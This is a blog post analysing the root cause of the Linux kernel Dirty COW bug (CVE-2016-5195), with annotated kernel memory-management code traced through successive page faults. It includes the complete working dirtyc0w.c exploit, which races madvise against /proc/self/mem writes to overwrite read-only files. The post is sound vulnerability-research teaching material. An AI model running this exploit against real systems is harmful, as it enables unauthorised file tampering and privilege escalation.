[Original] Linux Kernel CVE-2016-5195 (Dirty COW) Root-Cause Analysis
2020-12-11 18:44 · 9190


Environment Setup

Host environment

Ubuntu 16.04, kernel 4.15.0-45-generic

Download the kernel 4.4 source and build it

sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz

The Tsinghua mirror really is fast!

make bzImage -j4

And just like that, the build finished.

Testing

(Screenshots omitted.) The file initially contains aaaaaa; after running the PoC the contents have been successfully overwritten, confirming that the vulnerability is present.

Overview

Before getting into the details of the vulnerability, the following concepts need to be clear.

Copy-On-Write

P1 and P2 are two processes, with P2 created by P1 via fork(). At that point P1 and P2 actually share the same physical memory. Only when one of them modifies that shared memory is a private copy made.

 

This design is motivated by the following:

1. The child process usually calls an exec()-family function to do its actual work. (A process wants to run another program. Since the only way to create a new process is fork(), the process first forks a copy of itself, and then one of the copies, usually the child, calls exec() to replace itself with the new program; this is the typical pattern for programs such as shells.) A property of the exec family is that on success, control transfers directly to the entry point of the new program (for example, the classic glibc pwn trick of hijacking __malloc_hook to jump to a one_gadget that runs execve and spawns a shell).

2. fork() really only creates a copy of the parent with a different PID. If the entire parent address space were physically copied into the child at that point, but an exec-family call then immediately replaced the whole address space, the copy would have been wasted work. Hence the efficiency optimization.

Thus the COW mechanism was born.

 

Suppose there is a process P1 that creates a new process P2, and then P1 modifies page 3.
The figures below show what happens before and after P1 modifies page 3.

 

madvise()

Prototype: int madvise(void *addr, size_t length, int advice);

This tells the kernel that the user virtual memory in the range starting at addr, of length length, is expected to follow a particular usage pattern.

The advice parameter can take values such as:

MADV_ACCESS_DEFAULT
Resets the kernel's expected access pattern for the given range to the default.
 
MADV_ACCESS_LWP
Tells the kernel that the next LWP to move onto the given address range is the one that will access it most; the kernel allocates memory and other resources for the range and that LWP accordingly.
 
MADV_ACCESS_MANY
Advises the kernel that many processes or LWPs will access the given address range randomly across the system; the kernel allocates memory and other resources accordingly.
 
MADV_DONTNEED
Do not expect access in the near future.  (For the time being,
              the application is finished with the given range, so the
              kernel can free resources associated with it.)

In effect, this call tells the kernel that the memory from addr to addr+len will not be used in the near future; the kernel may free that memory to save space, and the corresponding page table entries are cleared.

POC

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
 
void *map;
int f;
struct stat st;
char *name;
 
void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}
 
void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}
 
 
int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}

Walkthrough

1. First we create a file foo whose permissions are read-only.

2. We open it with O_RDONLY, getting the file descriptor f, and fstat() stores the file's status in the st structure (of type struct stat):

struct stat64 {
    unsigned long long    st_dev;
    unsigned char    __pad0[4];
 
    unsigned long    __st_ino;
 
    unsigned int    st_mode;
    unsigned int    st_nlink;
 
    unsigned long    st_uid;
    unsigned long    st_gid;
 
    unsigned long long    st_rdev;
    unsigned char    __pad3[4];
 
    long long    st_size;
    unsigned long    st_blksize;
 
    /* Number 512-byte blocks allocated. */
    unsigned long long    st_blocks;
 
    unsigned long    st_atime;
    unsigned long    st_atime_nsec;
 
    unsigned long    st_mtime;
    unsigned int    st_mtime_nsec;
 
    unsigned long    st_ctime;
    unsigned long    st_ctime_nsec;
 
    unsigned long long    st_ino;
};

3. Next, mmap maps the file contents into user space as a private copy-on-write mapping. The parameters mean the following:

map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
 
//prototype
void *mmap(void *addr, size_t length, int prot, int flags,
                  int fd, off_t offset);
  • addr=NULL lets the kernel pick a suitable address.
  • length is the size of the region to map into the process address space; here, the file size.
  • prot sets the read/write attributes of the mapped region; here, read-only.
  • flags sets the mapping attributes; here MAP_PRIVATE creates a private copy-on-write mapping. (Multiple processes can access the same file through private mappings, and modifications are not written back to the file on disk.)
  • fd indicates this is a file mapping.
  • offset is the offset into the file.

4. Start two threads: madviseThread and procselfmemThread.

The procselfmemThread thread

Its argument is the string we want to write: m00000000000000000.

It first opens /proc/self/mem with O_RDWR (for the current process, /proc/self/mem is the process's memory contents, so modifying this file amounts to directly modifying the process's memory). But if you try it yourself, you will find:

root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem
cat: /proc/66310/mem: Input/output error

This is because regions that are not actually mapped cannot be read; a read only succeeds when the offset falls within a mapped region. So lseek is needed to position the write. Its prototype:

off_t lseek(int fd, off_t offset, int whence);

In the PoC we seek to the address returned by mmap (that is, where the file is mapped); the SEEK_SET argument tells the system that offset itself is the new read/write position. The thread then performs 100000000 writes trying to change the contents of this memory (remember, the mapping was created with read permission only).

The madviseThread thread

This thread is simple: it calls madvise 100000000 times, marking the mmap'd region from addr to addr+100 as MADV_DONTNEED.

These two threads race against each other.

Detailed race analysis

With the background above, the big picture should already be clear.

Dirty COW is exactly what its name says: dirty (the dirty bit) plus COW (copy-on-write).

Now let's dig into the details of the race.

The call chain for write(f,str,strlen(str)) is:

__get_free_pages+14           
mem_rw.isra+69               
mem_write+27               
__vfs_write+55               
vfs_write+169               
sys_write+85

Analysis of the write execution flow

mem_write

static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

This simply calls down into mem_rw, where the file structure corresponds to /proc/self/mem, buf is the user-space content to write, count is the size, and ppos is the offset.

mem_rw

static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)            //write=1
{
    struct mm_struct *mm = file->private_data;   
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;
 
    if (!mm)
        return 0;
 
    page = (char *)__get_free_page(GFP_TEMPORARY);        // allocate a free page; returns a pointer to the new, zeroed page
    if (!page)
        return -ENOMEM;
 
    copied = 0;
    if (!atomic_inc_not_zero(&mm->mm_users))  // atomically increment mm->mm_users and test that the result is non-zero
        goto free;                            // if it was zero, free the page and bail out
 
    while (count > 0) {                        // loop while there is data left to transfer
 
        int this_len = min_t(int, count, PAGE_SIZE);    // the smaller of count and PAGE_SIZE, as an int
 
        if (write && copy_from_user(page, buf, this_len)) {  // copy this_len bytes from buf into the newly allocated page
            copied = -EFAULT;
            break;
        }
 
        this_len = access_remote_vm(mm, addr, page, this_len, write); //write=1
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }
 
        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }
 
        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;
 
    mmput(mm);
 
free:
    free_page((unsigned long) page);            // free the page we allocated
    return copied;
}

First, the target mm_struct is taken from file->private_data.

mm_struct is defined as follows. It describes all of the information about a Linux process's memory address space:

struct mm_struct {
 
    // head of the linked list of VMA objects
    struct vm_area_struct * mmap;       /* list of VMAs */
    // red-black tree of VMA objects
    struct rb_root mm_rb;
    // most recently found VMA
    struct vm_area_struct * mmap_cache; /* last find_vma result */
 
    // function used to search the process address space for a free region
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
 
       unsigned long (*get_unmapped_exec_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
 
    // method called when a VMA is released
    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);
 
    // linear address where file memory mappings start
    unsigned long mmap_base;        /* base of mmap area */
 
 
    unsigned long task_size;        /* size of task vm space */
    /*
     * RHEL6 special for bug 790921: this same variable can mean
     * two different things. If sysctl_unmap_area_factor is zero,
     * this means the largest hole below free_area_cache. If the
     * sysctl is set to a positive value, this variable is used
     * to count how much memory has been munmapped from this process
     * since the last time free_area_cache was reset back to mmap_base.
     * This is ugly, but necessary to preserve kABI.
     */
    unsigned long cached_hole_size;
 
    // where the kernel searches for free linear addresses in the process address space
    unsigned long free_area_cache;      /* first hole of size cached_hole_size or larger */
 
    // pointer to the page global directory
    pgd_t * pgd;
 
    // number of users sharing the address space
    atomic_t mm_users;          /* How many users with user space? */
 
    // primary reference counter of the memory descriptor; when it drops to 0 there are no users left
    atomic_t mm_count;          /* How many references to "struct mm_struct" (users count as 1) */
 
    // number of VMAs
    int map_count;              /* number of VMAs */
 
    struct rw_semaphore mmap_sem;
 
    // lock protecting the task's page tables and reference counts
    spinlock_t page_table_lock;     /* Protects page tables and some counters */
 
    // list of possibly swapped mm_structs, strung off init_mm.mmlist
    struct list_head mmlist;        /* List of maybe swapped mm's.  These are globally strung
                         * together off init_mm.mmlist, and are protected
                         * by mmlist_lock
                         */
 
    /* Special counters, in some configurations protected by the
     * page_table_lock, in other configurations by being atomic.
     */
 
    mm_counter_t _file_rss;
    mm_counter_t _anon_rss;
    mm_counter_t _swap_usage;
 
    // peak resident set size of the process
    unsigned long hiwater_rss;  /* High-watermark of RSS usage */
    // peak virtual memory usage
    unsigned long hiwater_vm;   /* High-water virtual memory usage */
 
    // address space size, pages locked in memory, pages in shared file mappings, pages in executable mappings
    unsigned long total_vm, locked_vm, shared_vm, exec_vm;
    // user-mode stack pages, reserved pages, default flags, number of PTE pages
    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
    // bounds of the code and data segments
    unsigned long start_code, end_code, start_data, end_data;
    // heap bounds and stack start
    unsigned long start_brk, brk, start_stack;
    // start/end addresses of command-line arguments and of environment variables
    unsigned long arg_start, arg_end, env_start, env_end;
 
    unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */
 
    struct linux_binfmt *binfmt;
 
    cpumask_t cpu_vm_mask;
 
    /* Architecture-specific MM context */
    mm_context_t context;
 
    /* Swap token stuff */
    /*
     * Last value of global fault stamp as seen by this process.
     * In other words, this value gives an indication of how long
     * it has been since this task got the token.
     * Look at mm/thrash.c
     */
    unsigned int faultstamp;
    unsigned int token_priority;
    unsigned int last_interval;
 
    // default access flags of the VMAs
    unsigned long flags; /* Must use atomic bitops to access the bits */
 
    struct core_state *core_state; /* coredumping support */
#ifdef CONFIG_AIO
    spinlock_t      ioctx_lock;
    struct hlist_head   ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
    /*
     * "owner" points to a task that is regarded as the canonical
     * user/owner of this mm. All of the following must be true in
     * order for it to be changed:
     *
     * current == mm->owner
     * current->mm != mm
     * new_owner->mm == mm
     * new_owner->alloc_lock is held
     */
    struct task_struct *owner;
#endif
 
#ifdef CONFIG_PROC_FS
    /* store ref to file /proc/<pid>/exe symlink points to */
    struct file *exe_file;
    unsigned long num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
    struct mmu_notifier_mm *mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
    pgtable_t pmd_huge_pte; /* protected by page_table_lock */
#endif
    /* reserved for Red Hat */
#ifdef __GENKSYMS__
    unsigned long rh_reserved[2];
#else
    /* How many tasks sharing this mm are OOM_DISABLE */
    union {
        unsigned long rh_reserved_aux;
        atomic_t oom_disable_count;
    };
 
    /* base of lib map area (ASCII armour) */
    unsigned long shlib_base;
#endif
};

Its relationship to task_struct is as follows:

The system maintains a task_struct (process descriptor) for every process. The task_struct records all of the process's context, including the memory descriptor mm_struct, whose fields abstract the process's address space.

(Diagram omitted.) Adding the vma structures to the picture:

(Diagram omitted.)

The important fields here:

  • mm_users: the number of threads currently referencing this address space; a thread-level counter.
  • mm_count: the number of references to the mm_struct itself (kernel references, with all user-space users collectively counting as 1).
  • The mm_struct is freed only when both mm_users and mm_count drop to 0, i.e. when no user-level process is using the address space and no kernel thread references it.

After allocating the new page, mem_rw enters access_remote_vm:

/**
 * access_remote_vm - access another process' address space
 * @mm:        the mm_struct of the target address space
 * @addr:    start address to access
 * @buf:    source or destination buffer
 * @len:    number of bytes to transfer
 * @write:    whether the access is a write
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}
/*
 * Access another process' address space as given in mm.  If non-NULL, use the
 * given task for page fault accounting.
 */
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long addr, void *buf, int len, int write)
{
    struct vm_area_struct *vma;
    void *old_buf = buf;
 
    down_read(&mm->mmap_sem);
    /* ignore errors, just check how much was successfully transferred */
    while (len) {
        int bytes, ret, offset;
        void *maddr;
        struct page *page = NULL;
 
        ret = get_user_pages(tsk, mm, addr, 1,
                write, 1, &page, &vma);
 
        if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
            break;
#else
            /*
             * Check if this is a VM_IO | VM_PFNMAP VMA, which
             * we can access using slightly different code.
             */
            vma = find_vma(mm, addr);
            if (!vma || vma->vm_start > addr)
                break;
            if (vma->vm_ops && vma->vm_ops->access)
                ret = vma->vm_ops->access(vma, addr, buf,
                              len, write);
            if (ret <= 0)
                break;
            bytes = ret;
#endif
        } else {
            bytes = len;
            offset = addr & (PAGE_SIZE-1);
            if (bytes > PAGE_SIZE-offset)
                bytes = PAGE_SIZE-offset;
 
            maddr = kmap(page);
            if (write) {
                copy_to_user_page(vma, page, addr,
                          maddr + offset, buf, bytes);
                set_page_dirty_lock(page);
            } else {
                copy_from_user_page(vma, page, addr,
                            buf, maddr + offset, bytes);
            }
            kunmap(page);
            page_cache_release(page);
        }
        len -= bytes;
        buf += bytes;
        addr += bytes;
    }
    up_read(&mm->mmap_sem);
 
    return buf - old_buf;
}

The chain get_user_pages -> get_user_pages_locked -> __get_user_pages is entered because the write system call executes get_user_pages in the kernel to obtain the memory pages to be written.

 

__get_user_pages looks like this:

long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas, int *nonblocking)
{
    long i = 0;
    unsigned int page_mask;
    struct vm_area_struct *vma = NULL;
 
    if (!nr_pages)
        return 0;
 
    VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));
 
    /*
     * If FOLL_FORCE is set then do not force a full fault as the hinting
     * fault information is unrelated to the reference behaviour of a task
     * using the address space
     */
    if (!(gup_flags & FOLL_FORCE))
        gup_flags |= FOLL_NUMA;
 
    do {
        struct page *page;
        unsigned int foll_flags = gup_flags;    // access-semantics flags
        unsigned int page_increm;
 
        /* first iteration or cross vma bound */
        if (!vma || start >= vma->vm_end) {
            vma = find_extend_vma(mm, start);
            if (!vma && in_gate_area(mm, start)) {
                int ret;
                ret = get_gate_page(mm, start & PAGE_MASK,
                        gup_flags, &vma,
                        pages ? &pages[i] : NULL);
                if (ret)
                    return i ? : ret;
                page_mask = 0;
                goto next_page;
            }
 
            if (!vma || check_vma_flags(vma, gup_flags))
                return i ? : -EFAULT;
            if (is_vm_hugetlb_page(vma)) {
                i = follow_hugetlb_page(mm, vma, pages, vmas,
                        &start, &nr_pages, i,
                        gup_flags);
                continue;
            }
        }
retry:
        /*
         * If we have a pending SIGKILL, don't keep faulting pages and
         * potentially allocating memory.
         */
        if (unlikely(fatal_signal_pending(current)))
            return i ? i : -ERESTARTSYS;
        cond_resched();
        page = follow_page_mask(vma, start, foll_flags, &page_mask);
        if (!page) {            // follow_page_mask returned NULL:
            // (a) no physical page in the page table, i.e. a page fault, or
            // (b) the permissions requested in foll_flags violate the
            //     permissions of the memory page.
            // The first time through it is (a); the second time it is (b):
            // the page the PTE points to has no write permission, so NULL is returned.
            int ret;
            ret = faultin_page(tsk, vma, start, &foll_flags,
                    nonblocking);    // let faultin_page handle it
            switch (ret) {
            case 0:
                goto retry;
            case -EFAULT:
            case -ENOMEM:
            case -EHWPOISON:
                return i ? i : ret;
            case -EBUSY:
                return i;
            case -ENOENT:
                goto next_page;
            }
            BUG();
        } else if (PTR_ERR(page) == -EEXIST) {
            /*
             * Proper page table entry exists, but no corresponding
             * struct page.
             */
            goto next_page;
        } else if (IS_ERR(page)) {
            return i ? i : PTR_ERR(page);
        }
        if (pages) {
            pages[i] = page;
            flush_anon_page(vma, page, start);
            flush_dcache_page(page);
            page_mask = 0;
        }
next_page:
        if (vmas) {
            vmas[i] = vma;
            page_mask = 0;
        }
        page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
        if (page_increm > nr_pages)
            page_increm = nr_pages;
        i += page_increm;
        start += page_increm * PAGE_SIZE;
        nr_pages -= page_increm;
    } while (nr_pages);
    return i;
}
EXPORT_SYMBOL(__get_user_pages);

There are a few key points here.

  • When the access semantics in foll_flags violate the permissions of the memory page, follow_page_mask returns NULL, which triggers the call to faultin_page.
  • follow_page_mask walks the page tables to find the physical page backing a virtual address, descending through the four levels of the Linux page table structure.

The first call to follow_page_mask returns NULL (the first time because the page is not present; on a later call because the page the PTE points to lacks write permission, conflicting with the access semantics in foll_flags).

faultin_page is then called to handle the fault.

The call flow is as follows:

First page fault (page not present)

static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
        unsigned long address, unsigned int *flags, int *nonblocking)
{
         ....
           ret = handle_mm_fault(mm, vma, address, fault_flags);
 
}
int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
            unsigned long address, unsigned int flags)
{
    ......
    ret = __handle_mm_fault(mm, vma, address, flags);
    .....
}
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
                 unsigned long address, unsigned int flags)
{
    ......
    return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}
static int handle_pte_fault(struct mm_struct *mm,
             struct vm_area_struct *vma, unsigned long address,
             pte_t *pte, pmd_t *pmd, unsigned int flags)
{
    pte_t entry;
 
    entry = *pte;
    ......
    if (!pte_present(entry)) {    // is the PTE empty, i.e. is this a not-present (page) fault?
        if (pte_none(entry)) {
            if (vma_is_anonymous(vma))                        // anonymous page (no file backing: e.g. heap, stack, data)
                return do_anonymous_page(mm, vma, address,
                             pte, pmd, flags);
            else
                return do_fault(mm, vma, address, pte, pmd, // not anonymous: call do_fault to bring the page in
                        flags, entry);
        }
        return do_swap_page(mm, vma, address,
                    pte, pmd, flags, entry);
    }
    ......
    if (unlikely(!pte_same(*pte, entry)))
        goto unlock;
    if (flags & FAULT_FLAG_WRITE) {            // PTE is present, but the page is not writable
        if (!pte_write(entry))
            return do_wp_page(mm, vma, address,
                    pte, pmd, ptl, entry);    // call do_wp_page
        entry = pte_mkdirty(entry);
    }
    ......
}
 
 
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        unsigned int flags, pte_t orig_pte)
{
    pgoff_t pgoff = (((address & PAGE_MASK)
            - vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;
 
    pte_unmap(page_table);
    /* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
    if (!vma->vm_ops->fault)
        return VM_FAULT_SIGBUS;
    // write permission is not required
    if (!(flags & FAULT_FLAG_WRITE))
        return do_read_fault(mm, vma, address, pmd, pgoff, flags,        // call do_read_fault
                orig_pte);
    // write permission is required, and this is a private copy-on-write mapping
    if (!(vma->vm_flags & VM_SHARED))
        return do_cow_fault(mm, vma, address, pmd, pgoff, flags,        // call do_cow_fault
                orig_pte);
 
    return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
}
 
static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pmd_t *pmd,
        pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
    struct page *fault_page, *new_page;
    struct mem_cgroup *memcg;
    spinlock_t *ptl;
    pte_t *pte;
    int ret;
    ......
    new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);//alloc page for a VMA
    if (!new_page)
        return VM_FAULT_OOM;
 
    ......
 
    ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
    if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
        goto uncharge_out;
 
    if (fault_page)
        copy_user_highpage(new_page, fault_page, address, vma);
    __SetPageUptodate(new_page);
 
    ......
 
    do_set_pte(vma, address, new_page, pte, true, true);    // call do_set_pte
    mem_cgroup_commit_charge(new_page, memcg, false);
    lru_cache_add_active_or_unevictable(new_page, vma);
    pte_unmap_unlock(pte, ptl);
    if (fault_page) {
        unlock_page(fault_page);
        page_cache_release(fault_page);
    } else {
        /*
         * The fault handler has no page to lock, so it holds
         * i_mmap_lock for read to protect against truncate.
         */
        i_mmap_unlock_read(vma->vm_file->f_mapping);
    }
    return ret;
uncharge_out:
    mem_cgroup_cancel_charge(new_page, memcg);
    page_cache_release(new_page);
    return ret;
}
 
void do_set_pte(struct vm_area_struct *vma, unsigned long address,
        struct page *page, pte_t *pte, bool write, bool anon)
{
    pte_t entry;
 
    ......
    entry = mk_pte(page, vma->vm_page_prot);
    if (write)                                                // if this is a write
        entry = maybe_mkwrite(pte_mkdirty(entry), vma);       // pte_mkwrite only if VM_WRITE is set in vma->vm_flags; on the COW path pte_mkdirty() marks the page dirty
 
    ......
    set_pte_at(vma->vm_mm, address, pte, entry);
 
    /* no need to invalidate: a not-present page won't be cached */
    update_mmu_cache(vma, address, pte);
}
/*
 * Do pte_mkwrite, but only if the vma says VM_WRITE.  We do this when
 * servicing faults for write access.  In the normal case, do always want
 * pte_mkwrite.  But get_user_pages can cause write faults for mappings
 * that do not have writing enabled, when used by access_process_vm.
 */
static inline pte_t maybe_mkwrite(pte_t pte, struct vm_area_struct *vma)
{
    if (likely(vma->vm_flags & VM_WRITE))
        pte = pte_mkwrite(pte);
    return pte;
}
static inline pte_t pte_mkdirty(pte_t pte)
{
    return pte_set_flags(pte, _PAGE_DIRTY | _PAGE_SOFT_DIRTY);
}
 
static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        spinlock_t *ptl, pte_t orig_pte)
    __releases(ptl)
{
    struct page *old_page;
 
    old_page = vm_normal_page(vma, address, orig_pte); // look up the shared page
    if (!old_page) {                                   // lookup failed
        /*
         * VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
         * VM_PFNMAP VMA.
         *
         * We should not cow pages in a shared writeable mapping.
         * Just mark the pages writable and/or call ops->pfn_mkwrite.
         */
        // if the mapping is already shared and writable
        if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                     (VM_WRITE|VM_SHARED))
            return wp_pfn_shared(mm, vma, address, page_table, ptl,
                         orig_pte, pmd);
 
        pte_unmap_unlock(page_table, ptl);
        return wp_page_copy(mm, vma, address, page_table, pmd,
                    orig_pte, old_page);
    }
 
    /*
     * Take out anonymous pages first, anonymous shared vmas are
     * not dirty accountable.
     */
    // if it is an anonymous page used by only one process, reuse it directly
    if (PageAnon(old_page) && !PageKsm(old_page)) {
        // check whether another process raced with us and changed the page table
        if (!trylock_page(old_page)) {
            page_cache_get(old_page);
            pte_unmap_unlock(page_table, ptl);
            lock_page(old_page);
            page_table = pte_offset_map_lock(mm, pmd, address,
                             &ptl);
            if (!pte_same(*page_table, orig_pte)) {
                unlock_page(old_page);
                pte_unmap_unlock(page_table, ptl);
                page_cache_release(old_page);
                return 0;
            }
            page_cache_release(old_page);
        }
        // with no competitor present, reuse_swap_page checks whether page->_mapcount is 0, meaning only one process maps this anonymous page
        if (reuse_swap_page(old_page)) {
            /*
             * The page is all ours.  Move it to our anon_vma so
             * the rmap code will not search our parent or siblings.
             * Protected against the rmap code by the page lock.
             */
            page_move_anon_rmap(old_page, vma, address); // move the page to our anon_vma
            unlock_page(old_page);
            return wp_page_reuse(mm, vma, address, page_table, ptl,
                         orig_pte, old_page, 0, 0);
        }
        unlock_page(old_page);
    } else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                    (VM_WRITE|VM_SHARED))) {
        return wp_page_shared(mm, vma, address, page_table, pmd,
                      ptl, orig_pte, old_page);
    }
 
    /*
     * Ok, we need to copy. Oh, well..
     */
    page_cache_get(old_page);    // bump the reference count
 
    pte_unmap_unlock(page_table, ptl);
    return wp_page_copy(mm, vma, address, page_table, pmd,
                orig_pte, old_page);
}
handle_pte_fault
    -> do_fault (not an anonymous page, so bring the page in)
        -> do_cow_fault (because this is a private copy-on-write mapping)
            -> do_set_pte (write=1)
                -> maybe_mkwrite(): VM_WRITE is clear, so the PTE stays read-only
                    -> pte_mkdirty(): the page is marked dirty, but still read-only

When this finishes, the page is resident and marked dirty.

Second page fault (foll_flags permissions violate the page's permissions)

In handle_pte_fault(), if the faulting page is already present in memory, the fault is usually caused by writing to a read-only page, which requires COW: allocate a fresh page frame, copy the old data into it, and then write.

/*
 * Handle write page faults for pages that can be reused in the current vma
 *
 * This can happen either due to the mapping being with the VM_SHARED flag,
 * or due to us being the last reference standing to the page. In either
 * case, all we need to do here is to mark the page as writable and update
 * any related book-keeping.
 */
static inline int wp_page_reuse(struct mm_struct *mm,
            struct vm_area_struct *vma, unsigned long address,
            pte_t *page_table, spinlock_t *ptl, pte_t orig_pte,
            struct page *page, int page_mkwrite,
            int dirty_shared)
    __releases(ptl)
{
    pte_t entry;
    /*
     * Clear the pages cpupid information as the existing
     * information potentially belongs to a now completely
     * unrelated process.
     */
    if (page)
        page_cpupid_xchg_last(page, (1 << LAST_CPUPID_SHIFT) - 1);
 
    flush_cache_page(vma, address, pte_pfn(orig_pte));
    entry = pte_mkyoung(orig_pte);                    // set the _PAGE_ACCESSED bit
    entry = maybe_mkwrite(pte_mkdirty(entry), vma);   // still read-only; mark dirty
    if (ptep_set_access_flags(vma, address, page_table, entry, 1))
        update_mmu_cache(vma, address, page_table);
    pte_unmap_unlock(page_table, ptl);
 
    if (dirty_shared) {
        struct address_space *mapping;
        int dirtied;
 
        if (!page_mkwrite)
            lock_page(page);
 
        dirtied = set_page_dirty(page);
        VM_BUG_ON_PAGE(PageAnon(page), page);
        mapping = page->mapping;
        unlock_page(page);
        page_cache_release(page);
 
        if ((dirtied || page_mkwrite) && mapping) {
            /*
             * Some device drivers do not set page.mapping
             * but still dirty their pages
             */
            balance_dirty_pages_ratelimited(mapping);
        }
 
        if (!page_mkwrite)
            file_update_time(vma->vm_file);
    }
 
    return VM_FAULT_WRITE;
}
    handle_pte_fault
        The page is now present but foll_flags conflicts with its permissions, so call do_wp_page
            do_wp_page (handles copy-on-write)
            PageAnon(old_page) && !PageKsm(old_page): check that it is an anonymous page and not a KSM page
            reuse_swap_page(old_page): check whether page->_mapcount is 0, i.e. only one process uses this anonymous page
                wp_page_reuse(): the COW was already done earlier, so the page is reused directly
                return VM_FAULT_WRITE  (0x0008)
 
faultin_page()
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
        *flags &= ~FOLL_WRITE;        // back in faultin_page we enter this if: VM_WRITE being 0 means the region is not writable, and the COW is already done. FOLL_WRITE is cleared and we return to __get_user_pages.

Third/fourth page fault

After the second page fault, FOLL_WRITE has been cleared, so write permission is no longer requested.

Under normal conditions the thread now simply gets the corresponding page and writes to it. That write only touches the private mapped memory and does not affect the file on disk.

But if the madviseThread thread wins the race at this moment, it marks the mmap'd region MADV_DONTNEED, i.e. not needed in the near future. The kernel then clears the page table entries for the mapped memory (immediately dropping the page). This produces the fourth page fault.

